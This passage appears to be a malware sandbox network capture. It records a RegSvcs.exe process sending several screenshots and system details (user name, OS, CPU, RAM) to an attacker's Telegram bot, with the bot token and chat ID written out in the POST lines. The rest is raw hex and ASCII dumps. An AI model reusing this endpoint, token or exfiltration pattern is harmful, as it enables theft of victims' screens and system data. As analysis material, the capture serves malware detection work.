93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:05 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:05 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd3e24c46652e2--
                                                                                      2024-12-06 04:53:05 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:06 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:06 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170403,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460786,"document":{"file_name":"user-610930 2025-01-26 16-16-19.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZo2dSgzJTCCPS1oHhISX2NRSj1JWuAALxFAACOh6ZUgUEEzDm00lmAQAHbQADNgQ","file_unique_id":"AQAD8RQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZo2dSgzJTCCPS1oHhISX2NRSj1JWuAALxFAACOh6ZUgUEEzDm00lmAQAHbQADNgQ","file_unique_id":"AQAD8RQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaNnUoMyUwgj0taB4SEl9jUUo9SVrgAC8RQAAjoemVIFBBMw5tNJZjYE","file_unique_id":"AgAD8RQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 01/26/2025 15:16:19\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.449915149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:06 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd4046245e9326
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:53:06 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 39 2f 32 30 32 35 20 30 39 3a 32 30 3a 30 38 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd4046245e9326Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4046245e9326Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/29/2025 09:20:08User
                                                                                      2024-12-06 04:53:06 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:06 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:06 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:06 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:06 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:06 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd4046245e9326--
                                                                                      2024-12-06 04:53:06 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:07 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:07 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170404,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460787,"document":{"file_name":"user-610930 2025-01-29 09-20-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpGdSgzPnzRj_IPLtHTWH1kVtGGnFAALyFAACOh6ZUg5uzHD8QyCRAQAHbQADNgQ","file_unique_id":"AQAD8hQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpGdSgzPnzRj_IPLtHTWH1kVtGGnFAALyFAACOh6ZUg5uzHD8QyCRAQAHbQADNgQ","file_unique_id":"AQAD8hQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaRnUoMz580Y_yDy7R01h9ZFbRhpxQAC8hQAAjoemVIObsxw_EMgkTYE","file_unique_id":"AgAD8hQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 01/29/2025 09:20:08\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.449921149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:08 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd42db9af1601b
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:53:08 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 31 2f 32 30 32 35 20 31 36 3a 30 35 3a 31 30 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd42db9af1601bContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd42db9af1601bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/01/2025 16:05:10User
                                                                                      2024-12-06 04:53:08 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:08 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:08 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:08 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:08 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:08 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd42db9af1601b--
                                                                                      2024-12-06 04:53:09 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:09 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:09 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170405,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460789,"document":{"file_name":"user-610930 2025-02-01 16-15-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpWdSgzVBoMDt-p5M-bs8MMcsAoa6AALzFAACOh6ZUl9VYxuQFwREAQAHbQADNgQ","file_unique_id":"AQAD8xQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpWdSgzVBoMDt-p5M-bs8MMcsAoa6AALzFAACOh6ZUl9VYxuQFwREAQAHbQADNgQ","file_unique_id":"AQAD8xQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaVnUoM1QaDA7fqeTPm7PDDHLAKGugAC8xQAAjoemVJfVWMbkBcERDYE","file_unique_id":"AgAD8xQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/01/2025 16:05:10\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.449948149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:21 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd4a9ba686c827
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
